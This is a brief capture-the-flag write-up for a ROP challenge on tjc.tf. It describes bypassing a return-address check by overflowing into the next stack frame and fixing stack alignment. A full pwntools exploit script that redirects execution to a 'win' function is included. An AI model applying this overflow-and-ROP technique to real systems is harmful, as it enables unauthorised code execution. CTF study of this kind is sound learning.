Tags: pwn rop 

Rating:

This was a ROP challenge with a small twist.

The vulnerable function had some inline assembly to verify that the return address was a valid return address. But thankfully the buffer overflow was large enough such that we could overwrite the next stack frame that didn't have any validation.

There was one other minor detail. There was a stack alignment issue when the 'win' function called libc. To fix that I just ignored an initial "push rbp" in the win function. You could also write an extra 'ret' in the rop chain.

```python
import pwn
import time
import warnings

warnings.filterwarnings(action='ignore', category=BytesWarning)

elf = pwn.ELF("./out")
pwn.context.binary = elf
pwn.context.log_level = "DEBUG"
pwn.context(terminal=['tmux', 'split-window', '-h'])

libc = elf.libc
p = elf.process()
p = pwn.remote("tjc.tf", "31080")

# Start
# pwn.gdb.attach(p, "b *pwnable+70")

# add plus 8 for rsp alignment (ignore push rbp)
p.sendafter(b"> ", pwn.cyclic(18) + pwn.p64(0x401284) + 1*pwn.p64(0xdeadbeef) + pwn.p64(elf.symbols['win']+1))
p.interactive()
```

Original writeup (https://youtu.be/AqV3YUtcKGU?t=1751).